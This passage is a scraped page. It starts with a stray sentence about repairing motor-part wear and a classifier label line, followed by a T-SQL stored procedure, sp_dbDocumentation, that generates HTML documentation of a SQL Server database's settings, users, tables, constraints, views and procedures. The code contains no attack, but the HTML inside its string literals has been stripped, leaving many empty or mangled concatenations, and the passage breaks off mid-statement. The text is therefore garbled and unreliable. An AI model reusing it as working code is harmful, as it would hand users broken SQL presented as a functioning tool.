sufficient adhesion and hardness, which can fully guarantee the requirements of the motor assembly. This method is only suitable for cases where the amount of wear is not large, only a few tenths of a millimeter.
__label__pos
0.91475
CREATE Procedure sp_dbDocumentation AS BEGIN SET NOCOUNT ON --############################################################################# --this script produces formatted HTML documentation about the database and all its objects -- Execute in SSMS -- Be sure to "use " or make sure of your current database context before running. -- Save As .html --############################################################################# -- USAGE: exec sp_dbDocumentation --############################################################################# -- this script is an enhancement to a contribution found here: -- http://www.sqlservercentral.com/scripts/Miscellaneous/31005/ -- enhancement by Lowell Izaguirre scripts*at*stormrage.com. -- http://www.stormrage.com/SQLStuff/sp_dbDocumentation.txt -- You can use this however you like...this script is not rocket science, but it took a bit of work to create. -- the only thing that I ask -- is that if you adapt my procedure or make it better, to simply send me a copy of it, -- so I can learn from the things you've enhanced.The feedback you give will be what makes -- it worthwhile to me, and will be fed back to the SQL community. -- add this to your toolbox of helpful scripts. --############################################################################# -- important! note that this script has a dependancy to sp_GetDDL !!!!!! -- http://www.stormrage.com/SQLStuff/sp_GetDDL_Latest.txt --############################################################################# -- if you are going to put this in MASTER, and want it to be able to query -- each database's sys.indexes, you MUST mark it as a system procedure: -- both procs are required! -- EXECUTE sp_ms_marksystemobject 'sp_GetDDL' -- EXECUTE sp_ms_marksystemobject 'sp_dbDocumentation' --############################################################################# CREATE TABLE #Results(ResultsID int identity(1,1),ResultsText varchar(max) ) DECLARE @table_id int DECLARE @TableName varchar(300) DECLARE @QuotedTableName varchar(300) DECLARE @strHTML varchar(8000) DECLARE @strHTML1 varchar(8000) DECLARE @ColumnName varchar(200) DECLARE @ColumnType varchar(200) DECLARE @ColumnLength smallint DECLARE @ColumnComments sql_variant DECLARE @ColumnPrec smallint DECLARE @ColumnScale int DECLARE @ColumnCollation varchar(200) DECLARE @CType sysname DECLARE @CName sysname DECLARE @CPKTable sysname DECLARE @CPKColumn sysname DECLARE @CFKTable sysname DECLARE @CFKColumn sysname DECLARE @CKey smallint DECLARE @CDefault varchar(4000) DECLARE @Populated bit DECLARE @IDesc varchar(60) DECLARE @IRows varchar(11) DECLARE @IReserved varchar(11) DECLARE @IData varchar(11) DECLARE @IIndex varchar(11) DECLARE @IRowData varchar(11) DECLARE @SetOption bit DECLARE @databasename varchar(30) DECLARE @orderCol varchar(30) DECLARE @numeric bit DECLARE @Trigger varchar(50) DECLARE @DBPath varchar(500) DECLARE @ViewName varchar(200) DECLARE @ViewTableDep varchar(200) DECLARE @ViewColDep varchar(200) DECLARE @ViewColDepType varchar(200) DECLARE @ViewColDepLength smallint DECLARE @ViewColDepPrec smallint DECLARE @ViewColDepScale int DECLARE @ViewColDepCollation varchar(200) DECLARE @SPName varchar(200) DECLARE @SPTableDep varchar(200) DECLARE @SPColDep varchar(200) DECLARE @SPColDepType varchar(200) DECLARE @SPColDepLength smallint DECLARE @SPColDepPrec smallint DECLARE @SPColDepScale int DECLARE @SPColDepCollation varchar(200) DECLARE @ParamName sysname DECLARE @ParamDataType varchar(50) DECLARE @ParamType varchar(11) DECLARE @DBLastBackup smalldatetime DECLARE @DBLastBackupDays int DECLARE @UserLogin varchar(30) DECLARE @UserName varchar(30) DECLARE @UserGroup varchar(30) declare @results table(results varchar(max) ) --initialize HTML string SET @strHTML = '' SELECT @strHTML = @strHTML + '' + db_Name() + ' Database Definition ' insert into #Results (ResultsText) SELECT @strHTML SELECT @DBPath = (SELECT [filename] FROM master..sysdatabases WHERE [name] = db_Name()) SELECT @strHTML = ' ' + db_name() + ' Database Definition ' insert into #Results (ResultsText) SELECT @strHTML insert into #Results (ResultsText) SELECT ' SERVER SETTINGS | DATABASE SETTINGS | USERS | TABLES | VIEWS | STORED PROCEDURES | FUNCTIONS ' --############################################################################# --Table Of Contents --############################################################################# SET NOCOUNT ON SELECT @orderCol = 'Description' SELECT @DatabaseName = db_name() SELECT @numeric = 1 IF @DatabaseName <> 'Master' AND NOT EXISTS (SELECT 1 FROM master..sysdatabases WHERE name = @DatabaseName AND (status & 4) = 4) BEGIN EXEC sp_dboption @databaseName ,'SELECT into/bulkcopy', 'true' SELECT @SetOption = 1 END IF EXISTS (SELECT 1 FROM master.sys.objects WHERE name = 'space1') DROP TABLE master..space1 CREATE TABLE master..Space1 (name varchar(60), rows varchar(11), reserved varchar(11), data varchar(11), index_size varchar(11), unused varchar(11)) DECLARE @Cmd varchar(255) DECLARE cSpace CURSOR FOR SELECT 'USE ' + @DatabaseName + ' INSERT into master..space1 EXEC sp_spaceUsed ''[' + u.name + '].[' + o.name + ']''' FROM sysobjects o JOIN sysusers u on u.uid = o.uid WHERE type = 'U' AND o.name <> 'Space1' OPEN cSPACE FETCH cSpace INTO @Cmd WHILE @@FETCH_STATUS =0 BEGIN -- PRINT @Cmd EXECUTE (@Cmd) FETCH cSpace INTO @Cmd END DEALLOCATE cSPace DECLARE cursor_index CURSOR FOR SELECT Description,Rows,Reserved,Data,Index_size,dataPerRows FROM ( SELECT 3 DataOrder, CONVERT(int,CASE @OrderCol WHEN 'Rows' THEN Rows WHEN 'Reserved' THEN SUBSTRING(Reserved, 1,LEN(Reserved)-2) WHEN 'data' THEN SUBSTRING(Data, 1,LEN(Data)-2) WHEN 'index_size' THEN SUBSTRING(Index_size, 1,LEN(index_Size)-2) WHEN 'unused' THEN SUBSTRING(unused, 1,LEN(unused)-2) END) OrderData, name Description, rows, CASE @NUMERIC WHEN 0 THEN reserved ELSE SUBSTRING(reserved, 1, len(reserved)-2) END reserved, CASE @NUMERIC WHEN 0 THEN data ELSE SUBSTRING(data, 1, len(data)-2) END data, CASE @NUMERIC WHEN 0 THEN index_size ELSE SUBSTRING(index_size, 1, len(index_size)-2) END index_size, CASE WHEN Rows = 0 THEN '0' ELSE CONVERT(varchar(11),CONVERT(numeric(10,2),CONVERT(numeric,SUBSTRING(reserved, 1, len(reserved)-2)) /rows*1000)) END DataPerRows FROM master..Space1 ) Stuff ORDER BY DataOrder, OrderData desc, description OPEN cursor_index SET @strHTML = ' ' insert into #Results (ResultsText) SELECT @strHTML insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' FETCH NEXT FROM cursor_index INTO @IDesc,@IRows,@IReserved,@IData,@IIndex,@IRowData WHILE (@@FETCH_STATUS = 0) BEGIN SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_index INTO @IDesc,@IRows,@IReserved,@IData,@IIndex,@IRowData END CLOSE cursor_index DEALLOCATE cursor_index DECLARE cursor_views_index CURSOR FOR SELECT [name] FROM sysobjects WHERE [xtype] = 'V' AND [category] <> 2 ORDER BY [name] OPEN cursor_views_index FETCH NEXT FROM cursor_views_index INTO @ViewName WHILE (@@FETCH_STATUS = 0) BEGIN SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_views_index INTO @ViewName END CLOSE cursor_views_index DEALLOCATE cursor_views_index DECLARE cursor_sp_index CURSOR FOR SELECT [name] FROM sysobjects WHERE [xtype] = 'P' AND [category] <> 2 ORDER BY [name] OPEN cursor_sp_index FETCH NEXT FROM cursor_sp_index INTO @SPName WHILE (@@FETCH_STATUS = 0) BEGIN SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_sp_index INTO @SPName END CLOSE cursor_sp_index DEALLOCATE cursor_sp_index SELECT @strHTML = ' Table Of Contents   Table   Row Count   Reserved   Row Data   Index Size   Table Data   Server Options     Database Options     Database Users     ' + ISNULL(@IDesc, ' ') + '  ' + ISNULL(@IRows, ' ') + '  ' + ISNULL(@IReserved, ' ') + '  ' + ISNULL(@IData, ' ') + '  ' + ISNULL(@IIndex, ' ') + '  ' + ISNULL(@IRowData, ' ') + '   ' + ISNULL(@ViewName, ' ') + '     ' + ISNULL(@SPName, ' ') + '     ' insert into #Results (ResultsText) SELECT @strHTML EXECUTE ('DROP TABLE master..space1') IF @SetOption = 1 EXEC sp_dboption @databasename ,'SELECT into/bulkcopy', 'false' insert into #Results (ResultsText) SELECT ' ' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT '' insert into #Results (ResultsText) SELECT ' Server Settings   Table  Row Count   Server name  ' + convert(varchar(30),@@SERVERNAME) + '   Instance  ' + convert(varchar(30),@@SERVICENAME) + '   Current Date Time  ' + convert(varchar(30),getdate(),113) + '   User  ' + USER_NAME() + '   Number of connections  ' + convert(varchar(30),@@connections) + '   Language  ' + convert(varchar(30),@@language) + '   Language Id  ' + convert(varchar(30),@@langid) + '   Lock Timeout  ' + convert(varchar(30),@@LOCK_TIMEOUT) + '   Maximum of connections  ' + convert(varchar(30),@@MAX_CONNECTIONS) + '   CPU Busy  ' + convert(varchar(30),@@CPU_BUSY/1000) + '   CPU Idle  ' + convert(varchar(30),@@IDLE/1000) + '   IO Busy  ' + convert(varchar(30),@@IO_BUSY/1000) + '   Packets received  ' + convert(varchar(30),@@PACK_RECEIVED) + '   Packets sent  ' + convert(varchar(30),@@PACK_SENT) + '   Packets w errors  ' + convert(varchar(30),@@PACKET_ERRORS) + '   TimeTicks  ' + convert(varchar(30),@@TIMETICKS) + '   IO Errors  ' + convert(varchar(30),@@TOTAL_ERRORS) + '   Total Read  ' + convert(varchar(30),@@TOTAL_READ) + '   Total Write  ' + convert(varchar(30),@@TOTAL_WRITE) + '   Back To Top ^ ' SET @strHTML = ' ' insert into #Results (ResultsText) SELECT @strHTML SELECT @strHTML = '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' + '' FROM master..sysdatabases WHERE [name] = db_Name() GROUP BY [name] insert into #Results (ResultsText) SELECT @strHTML SELECT @DBPath = (SELECT [filename] FROM master..sysdatabases WHERE [name] = db_Name()) insert into #Results (ResultsText) SELECT '' SELECT @DBLastBackup = (SELECT CONVERT( SmallDateTime , MAX(Backup_Finish_Date)) FROM MSDB.dbo.BackupSet WHERE Type = 'd' AND Database_Name = db_Name()) insert into #Results (ResultsText) SELECT '' SELECT @DBLastBackupDays = (SELECT DATEDIFF(d, MAX(Backup_Finish_Date), Getdate()) FROM MSDB.dbo.BackupSet WHERE Type = 'd' AND Database_Name = db_Name()) insert into #Results (ResultsText) SELECT '' SET @strHTML = ' Database Settings   Option   Setting   name  ' + [name] + '   autoclose  ' + MIN(CASE status & 1 WHEN 1 THEN 'True' ELSE 'False' END) + '   SELECT into/bulkcopy  ' + MIN(CASE status & 4 WHEN 4 THEN 'True' ELSE 'False' END) + '   trunc. log on chkpt  ' + MIN(CASE status & 8 WHEN 8 THEN 'True' ELSE 'False' END) + '   torn page detection  ' + MIN(CASE status & 16 WHEN 16 THEN 'True' ELSE 'False' END) + '   loading  ' + MIN(CASE status & 32 WHEN 32 THEN 'True' ELSE 'False' END) + '   pre recovery  ' + MIN(CASE status & 64 WHEN 64 THEN 'True' ELSE 'False' END) + '   recovering  ' + MIN(CASE status & 128 WHEN 128 THEN 'True' ELSE 'False' END) + '   Falset recovered  ' + MIN(CASE status & 256 WHEN 256 THEN 'True' ELSE 'False' END) + '   offline  ' + MIN(CASE status & 512 WHEN 512 THEN 'True' ELSE 'False' END) + '   read only  ' + MIN(CASE status & 1024 WHEN 1024 THEN 'True' ELSE 'False' END) + '   dbo use only  ' + min(CASE status & 2048 WHEN 2048 THEN 'True' ELSE 'False' END) + '   single user  ' + MIN(CASE status & 4096 WHEN 4096 THEN 'True' ELSE 'False' END) + '   emergency mode  ' + MIN(CASE status & 32768 WHEN 32768 THEN 'True' ELSE 'False' END) + '   autoshrink  ' + MIN(CASE status & 4194304 WHEN 4194304 THEN 'True' ELSE 'False' END) + '   cleanly shutdown  ' + MIN(CASE status & 1073741824 WHEN 1073741824 THEN 'True' ELSE 'False' END) + '   ANSI null default  ' + MIN(CASE status2 & 16384 WHEN 16384 THEN 'True' ELSE 'False' END) + '   concat null yields null  ' + MIN(CASE status2 & 65536 WHEN 65536 THEN 'True' ELSE 'False' END) + '   recursive triggers  ' + MIN(CASE status2 & 131072 WHEN 131072 THEN 'True' ELSE 'False' END) + '   default to local cursor  ' + MIN(CASE status2 & 1048576 WHEN 1048576 THEN 'True' ELSE 'False' END) + '   quoted identifier  ' + MIN(CASE status2 & 8388608 WHEN 8388608 THEN 'True' ELSE 'False' END) + '   cursor close on commit  ' + MIN(CASE status2 & 33554432 WHEN 33554432 THEN 'True' ELSE 'False' END) + '   ANSI nulls  ' + MIN(CASE status2 & 67108864 WHEN 67108864 THEN 'True' ELSE 'False' END) + '   ANSI warnings  ' + MIN(CASE status2 & 268435456 WHEN 268435456 THEN 'True' ELSE 'False' END) + '   full text enabled  ' + MIN(CASE status2 & 536870912 WHEN 536870912 THEN 'True' ELSE 'False' END) + '   Data Path  ' + @DBPath + '   Last Backup  ' + ISNULL(CONVERT(varchar(50),@DBLastBackup),' ') + '   Days Since Last Backup  ' + ISNULL(CONVERT(varchar(10),@DBLastBackupDays),' ') + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML --############################################################################# --users --############################################################################# DECLARE cursor_users CURSOR FOR SELECT LEFT(rtrim(CASE u1.islogin WHEN 1 THEN u1.name END), 30), LEFT(rtrim(u1.name), 30), LEFT(rtrim(u2.name), 30) FROM sysusers u1, sysusers u2 WHERE u1.gid = u2.uid AND u1.sid IS NOT NULL AND u1.name NOT IN ('guest', 'dbo', 'Administrator') OPEN cursor_users SET @strHTML = ' ' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_users INTO @UserLogin,@UserName,@UserGroup WHILE (@@FETCH_STATUS = 0) BEGIN SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_users INTO @UserLogin,@UserName,@UserGroup END CLOSE cursor_users DEALLOCATE cursor_users SELECT @strHTML = ' Users   Login name   User name   Group name   ' + ISNULL(@UserLogin, ' ') + '  ' + ISNULL(@UserName, ' ') + '  ' + ISNULL(@UserGroup, ' ') + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML --############################################################################# --tables --############################################################################# SELECT @strHTML = ' Tables ' insert into #Results (ResultsText) SELECT @strHTML if not exists(SELECT [name] FROM sysobjects WHERE [xtype] = 'U' AND [category] <> 2) insert into #Results (ResultsText) SELECT ' No Tables Exist in ' + db_name() + ' ' DECLARE cursor_documentation CURSOR FOR SELECT DISTINCT id , [name] FROM sysobjects WHERE OBJECTPROPERTY(sysobjects.id, 'IsMSShipped') = 0 AND sysobjects.type = 'U' ORDER BY sysobjects.[name] OPEN cursor_documentation FETCH NEXT FROM cursor_documentation INTO @table_id, @TableName WHILE (@@FETCH_STATUS = 0) BEGIN SET @QuotedTableName = quotename(@TableName) --building HTML tables documentation SELECT @strHTML = '' FROM sysobjects WHERE sysobjects.id = @table_id insert into #Results (ResultsText) SELECT @strHTML SET @strHTML = '' DECLARE cursor_Column CURSOR FOR SELECT DISTINCT syscolumns.colorder, syscolumns.[name], (SELECT top 1 systypes.[name] FROM systypes WHERE xtype = syscolumns.xtype), syscolumns.length, sysproperties.COLUMN_DESCRIPTION AS [value], syscolumns.prec, syscolumns.scale, syscolumns.[collation] FROM sysobjects INNER JOIN syscolumns ON sysobjects.id = syscolumns.id INNER JOIN systypes ON syscolumns.xtype = systypes.xtype LEFT OUTER JOIN (SELECT DISTINCT OBJECT_NAME(c.object_id) AS TABLE_NAME, c.object_ID AS ID, COALESCE(ex.minor_id,0) as SMALLID, c.name AS COLUMN_NAME, systypes.Name AS DATA_TYPE, c.max_length as CHARACTER_MAXIMUM_LENGTH, ex.name + ':' + CONVERT(VARCHAR(8000),ex.value) AS COLUMN_DESCRIPTION, syscomments.text as COLUMN_DEFAULT, c.is_nullable as IS_NULLABLE FROM sys.columns c INNER JOIN systypes ON c.system_type_id = systypes.xtype LEFT JOIN syscomments ON c.default_object_id = syscomments.id LEFT OUTER JOIN sys.extended_properties ex ON ex.major_id = c.object_id AND ex.minor_id = c.column_id --AND ex.name = 'MS_Description' ALL descriptions! WHERE OBJECTPROPERTY(c.object_id, 'IsMsShipped')=0 )sysproperties ON syscolumns.colid = sysproperties.smallid AND syscolumns.id = sysproperties.id WHERE sysobjects.id = @table_id ORDER BY syscolumns.colorder OPEN cursor_Column DECLARE @colid int FETCH NEXT FROM cursor_Column INTO @colid,@ColumnName, @ColumnType, @ColumnLength, @ColumnComments, @ColumnPrec, @ColumnScale, @ColumnCollation WHILE (@@FETCH_STATUS = 0) BEGIN SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_Column INTO @colid,@ColumnName, @ColumnType, @ColumnLength, @ColumnComments, @ColumnPrec, @ColumnScale, @ColumnCollation END CLOSE cursor_Column DEALLOCATE cursor_Column --newly added table DDL definition DELETE FROM @results insert into @results exec sp_getddl @QuotedTableName SELECT @strHTML = '' FROM @results insert into #Results (ResultsText) SELECT @strHTML SELECT @strHTML = ' ' + sysobjects.name + '   Column   Type   Length   Precision   Scale   Collation   Comments   ' + @ColumnName + '  ' + ISNULL(@ColumnType, ' ') + '  ' + ISNULL(convert(varchar(5), @ColumnLength), ' ') + '  ' + ISNULL(convert(varchar(5), @ColumnPrec), ' ') + '  ' + ISNULL(convert(varchar(5), @ColumnScale), ' ') + '  ' + ISNULL(@ColumnCollation, ' ') + '  ' + ISNULL(convert(varchar(500), @ColumnComments), ' ') + '   ' + REPLACE(REPLACE(results,CHAR(32),' ' ),CHAR(13) , ' ' + CHAR(13)) + '   ' insert into #Results (ResultsText) SELECT @strHTML SELECT @strHTML1 = '' insert into #Results (ResultsText) SELECT @strHTML1 SELECT @strHTML1 = '' FROM sysobjects WHERE sysobjects.id = @table_id SET @Populated = 0 SET @strHTML = '' DECLARE cursor_Constraint CURSOR FOR (SELECT CASE o1.xtype WHEN 'C' THEN 'Check' WHEN 'D' THEN 'Default' WHEN 'F' THEN 'Foreign Key' WHEN 'PK' THEN 'Primary Key' WHEN 'UQ' THEN 'Unique' ELSE 'Other' END AS 'Constraint Type', o1.name AS 'Constraint name', o.name AS 'Table name', c1.name AS 'Column name', NULL AS 'FK Table name', NULL AS 'FK Column name', k.keyno AS 'KeyNo', NULL AS 'Default/Check Value' FROM sysobjects o JOIN sysobjects o1 ON o1.Parent_obj = o.id JOIN sysconstraints c ON c.constid = o1.id JOIN sysindexes i ON i.id = o.id AND i.name = o1.name JOIN sysindexkeys k ON k.id = i.id AND k.indid = i.indid JOIN syscolumns c1 ON c1.id = k.id AND c1.colid = k.colid WHERE o1.xtype = 'UQ' AND o.id = @table_id UNION SELECT CASE o1.xtype WHEN 'C' THEN 'Check' WHEN 'D' THEN 'Default' WHEN 'F' THEN 'Foreign Key' WHEN 'PK' THEN 'Primary Key' WHEN 'UQ' THEN 'Unique' ELSE 'Other' END AS 'Constraint Type', o1.name AS 'Constraint name', o.name AS 'Table name', c1.name AS 'Column name', NULL AS 'FK Table name', NULL AS 'FK Column name', NULL AS 'KeyNo', c.text AS 'Default/Check Value' FROM sysobjects o JOIN sysobjects o1 ON o1.Parent_obj = o.id JOIN syscolumns c1 ON c1.id = o1.parent_obj AND c1.colid = o1.info JOIN syscomments c ON o1.id = c.id WHERE o1.xtype In ('C' , 'D') AND o.id = @table_id UNION SELECT CASE o1.xtype WHEN 'C' THEN 'Check' WHEN 'D' THEN 'Default' WHEN 'F' THEN 'Foreign Key' WHEN 'PK' THEN 'Primary Key' WHEN 'UQ' THEN 'Unique' ELSE 'Other' END AS 'Constraint Type', o1.name AS 'Constraint name', o.name AS 'FK Table name', c1.name AS 'FK Column name', o2.name AS 'Table Table', c2.name AS 'Column name', fk.keyno AS 'KeyNo', NULL AS 'Default/Check Value' FROM sysobjects o JOIN sysobjects o1 ON o1.Parent_obj = o.id JOIN sysforeignkeys fk ON fk.constid = o1.id JOIN sysobjects o2 ON o2.id = fk.rkeyid LEFT JOIN syscolumns c1 ON c1.id = fk.fkeyid AND c1.colid = fk.fkey LEFT JOIN syscolumns c2 ON c2.id = fk.rkeyid AND c2.colid = fk.rkey WHERE o1.xtype = 'F' AND o.id = @table_id UNION SELECT CASE o1.xtype WHEN 'C' THEN 'Check' WHEN 'D' THEN 'Default' WHEN 'F' THEN 'Foreign Key' WHEN 'PK' THEN 'Primary Key' WHEN 'UQ' THEN 'Unique' ELSE 'Other' END AS 'Constraint Type', o1.name AS 'Constraint name', o.name AS 'Table name', c1.name AS 'Column name', o2.name AS 'FK Table', c2.name AS 'FK Column name', fk.keyno AS 'KeyNo', NULL AS 'Default/Check Value' FROM sysobjects o JOIN sysobjects o1 ON o1.Parent_obj = o.id JOIN sysforeignkeys fk ON fk.rkeyid = o.id JOIN sysobjects o2 ON o2.id = fk.fkeyid LEFT JOIN syscolumns c1 ON c1.id = fk.rkeyid AND c1.colid = fk.rkey LEFT JOIN syscolumns c2 ON c2.id = fk.rkeyid AND c2.colid = fk.rkey where o1.xtype = 'PK' AND o.id = @table_id ) ORDER BY [Constraint Type] OPEN cursor_Constraint FETCH NEXT FROM cursor_Constraint INTO @CType,@CName,@CPKTable,@CPKColumn,@CFKTable,@CFKColumn,@CKey,@CDefault WHILE (@@FETCH_STATUS = 0) BEGIN IF @Populated = 0 BEGIN insert into #Results (ResultsText) SELECT @strHTML1 END SET @Populated = 1 SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_Constraint INTO @CType,@CName,@CPKTable,@CPKColumn,@CFKTable,@CFKColumn,@CKey,@CDefault END CLOSE cursor_Constraint DEALLOCATE cursor_Constraint SELECT @strHTML = ' Constraints   Constraint Type   Contraint name   Table   Column   FK Table   FK Column   Key No.   Default   ' + ISNULL(@CType, ' ') + '  ' + ISNULL(@CName, ' ') + '  ' + ISNULL(convert(varchar(120), @CPKTable), ' ') + '  ' + ISNULL(convert(varchar(120), @CPKColumn), ' ') + '  ' + ISNULL(convert(varchar(120), @CFKTable), ' ') + '  ' + ISNULL(convert(varchar(120), @CFKColumn), ' ') + '  ' + ISNULL(convert(varchar(5), @CKey), ' ') + '  ' + ISNULL(convert(varchar(255), @CDefault), ' ') + '   ' insert into #Results (ResultsText) SELECT @strHTML --############################################################################# --triggers --############################################################################# SET @strHTML1 = '' insert into #Results (ResultsText) SELECT @strHTML1 SET @strHTML1='' --optional if you explicitly want to see "no triggers exist" if not exists(SELECT [name] FROM sysobjects WHERE [xtype] = 'TR' AND parent_obj = @table_id) insert into #Results (ResultsText) SELECT '' SET @Populated = 0 SET @strHTML = '' DECLARE cursor_Triggers CURSOR FOR SELECT [name] AS TriggerName FROM sysobjects WHERE xtype = 'TR' AND parent_obj = @table_id OPEN cursor_Triggers FETCH NEXT FROM cursor_Triggers INTO @Trigger WHILE (@@FETCH_STATUS = 0) BEGIN IF @Populated = 0 BEGIN insert into #Results (ResultsText) SELECT @strHTML1 END SET @Populated = 1 SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_Triggers INTO @Trigger END CLOSE cursor_Triggers DEALLOCATE cursor_Triggers SELECT @strHTML = ' Triggers   No Triggers Exist for ' + @TableName + ' ' + ISNULL(@Trigger, ' ') + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_documentation INTO @table_id, @TableName END CLOSE cursor_documentation DEALLOCATE cursor_documentation --############################################################################# --views --############################################################################# SELECT @strHTML = ' Views ' insert into #Results (ResultsText) SELECT @strHTML if not exists(SELECT [name] FROM sysobjects WHERE [xtype] = 'V' AND [category] <> 2) insert into #Results (ResultsText) SELECT ' No Views exist in ' + db_name() + ' ' DECLARE cursor_views CURSOR FOR SELECT [name] FROM sysobjects WHERE [xtype] = 'V' AND [category] <> 2 ORDER BY [name] OPEN cursor_views FETCH NEXT FROM cursor_views INTO @ViewName if @@FETCH_STATUS <> 0 begin SET @strHTML=' ' insert into #Results (ResultsText) SELECT @strHTML end WHILE (@@FETCH_STATUS = 0) BEGIN --Begin Table with view name as title SET @strHTML = ' ' + @ViewName + '   No Views Exist in ' + db_name() + '   ' insert into #Results (ResultsText) SELECT @strHTML SET @strHTML = '' DECLARE cursor_viewdeps CURSOR FOR SELECT TableSysObjects.name AS [Table],col.name AS [Column],(SELECT TOP 1 systypes.[name] FROM systypes WHERE xtype = col.xtype),col.length,col.prec, col.scale, col.[collation] FROM sysobjects ViewSysObjects LEFT OUTER JOIN sysdepends dep ON ViewSysObjects.id = dep.id LEFT OUTER JOIN sysobjects TableSysObjects ON dep.depid = TableSysObjects.id LEFT OUTER JOIN syscolumns col ON dep.depnumber = col.colid AND TableSysObjects.id = col.id WHERE ViewSysObjects.xtype = 'V' And ViewSysObjects.category = 0 AND ViewSysObjects.name = @ViewName ORDER BY ViewSysObjects.name,TableSysObjects.name,col.name OPEN cursor_viewdeps FETCH NEXT FROM cursor_viewdeps INTO @ViewTableDep,@ViewColDep,@ViewColDepType,@ViewColDepLength,@ViewColDepPrec,@ViewColDepScale,@ViewColDepCollation WHILE (@@FETCH_STATUS = 0) BEGIN -- Write the view dependencies SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_viewdeps INTO @ViewTableDep,@ViewColDep,@ViewColDepType,@ViewColDepLength,@ViewColDepPrec,@ViewColDepScale,@ViewColDepCollation END CLOSE cursor_viewdeps DEALLOCATE cursor_viewdeps --newly added proc DDL definition DELETE FROM @results insert into @results exec sp_GetDDL @ViewName SET @strHTML='' SELECT @strHTML =@strHTML + + REPLACE(REPLACE(results,CHAR(32),CHAR(160) ),CHAR(13) , ' ' + CHAR(13)) FROM @results SELECT @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML --end newly added proc DDL definition SELECT @strHTML = ' ' + @ViewName + '   Table Dependencies   Column Dependencies   Column Type   Size   Precision   Scale   Collation   ' + ISNULL(convert(varchar(200), @ViewTableDep), ' ') + '  ' + ISNULL(convert(varchar(200), @ViewColDep), ' ') + '  ' + ISNULL(@ViewColDepType, ' ') + '  ' + ISNULL(convert(varchar(5), @ViewColDepLength), ' ') + '  ' + ISNULL(convert(varchar(5), @ViewColDepPrec), ' ') + '  ' + ISNULL(convert(varchar(5), @ViewColDepScale), ' ') + '  ' + ISNULL(@ViewColDepCollation, ' ') + '   ' + @strHTML + '   Back To Top ^ ' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_views INTO @ViewName END CLOSE cursor_views DEALLOCATE cursor_views --############################################################################# --stored procs --############################################################################# SELECT @strHTML = ' Stored Procedures ' insert into #Results (ResultsText) SELECT @strHTML if not exists(SELECT [name] FROM sysobjects WHERE [xtype] = 'P' AND [category] <> 2) insert into #Results (ResultsText) SELECT ' No Procedures Exist in ' + db_name() + ' ' DECLARE cursor_sp CURSOR FOR SELECT [name] FROM sysobjects WHERE [xtype] = 'P' AND [category] <> 2 ORDER BY [name] OPEN cursor_sp FETCH NEXT FROM cursor_sp INTO @SPName WHILE (@@FETCH_STATUS = 0) BEGIN --Begin Table with view name as title SET @strHTML = ' ' insert into #Results (ResultsText) SELECT @strHTML SET @strHTML = '' DECLARE cursor_spdeps CURSOR FOR SELECT TableSysObjects.name AS [Table],col.name AS [Column],(SELECT top 1 systypes.[name] FROM systypes WHERE xtype = col.xtype),col.length,col.prec, col.scale, col.[collation] FROM sysobjects ViewSysObjects LEFT OUTER JOIN sysdepends dep ON ViewSysObjects.id = dep.id LEFT OUTER JOIN sysobjects TableSysObjects ON dep.depid = TableSysObjects.id LEFT OUTER JOIN syscolumns col ON dep.depnumber = col.colid AND TableSysObjects.id = col.id WHERE ViewSysObjects.xtype = 'P' And ViewSysObjects.category = 0 AND ViewSysObjects.name = @SPName ORDER BY ViewSysObjects.name,TableSysObjects.name,col.name OPEN cursor_spdeps FETCH NEXT FROM cursor_spdeps INTO @SPTableDep,@SPColDep,@SPColDepType,@SPColDepLength,@SPColDepPrec,@SPColDepScale,@SPColDepCollation WHILE (@@FETCH_STATUS = 0) BEGIN -- Write the view dependencies IF @SPColDep = '' BEGIN SET @SPColDep = ' ' END SET @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML FETCH NEXT FROM cursor_spdeps INTO @SPTableDep,@SPColDep,@SPColDepType,@SPColDepLength,@SPColDepPrec,@SPColDepScale,@SPColDepCollation END CLOSE cursor_spdeps DEALLOCATE cursor_spdeps --newly added proc DDL definition DELETE FROM @results insert into @results exec sp_GetDDL @SPName SET @strHTML='' SELECT @strHTML =@strHTML + + REPLACE(REPLACE(results,CHAR(32),CHAR(160) ),CHAR(13) , ' ' + CHAR(13)) FROM @results SELECT @strHTML = '' insert into #Results (ResultsText) SELECT @strHTML --end newly added proc DDL definition SELECT @strHTML = ' ' + @SPName + ' ' insert into #Results (ResultsText) SELECT @strHTML SET @Populated = 0 SET @strHTML1 = ' ' DECLARE cursor_Params CURSOR FOR SELECT rtrim(c.name) PARAMETER , CASE WHEN TYPE_NAME(c.xusertype) IN ('decimal','numeric','float','real') THEN TYPE_NAME(c.xusertype) + ' (' + 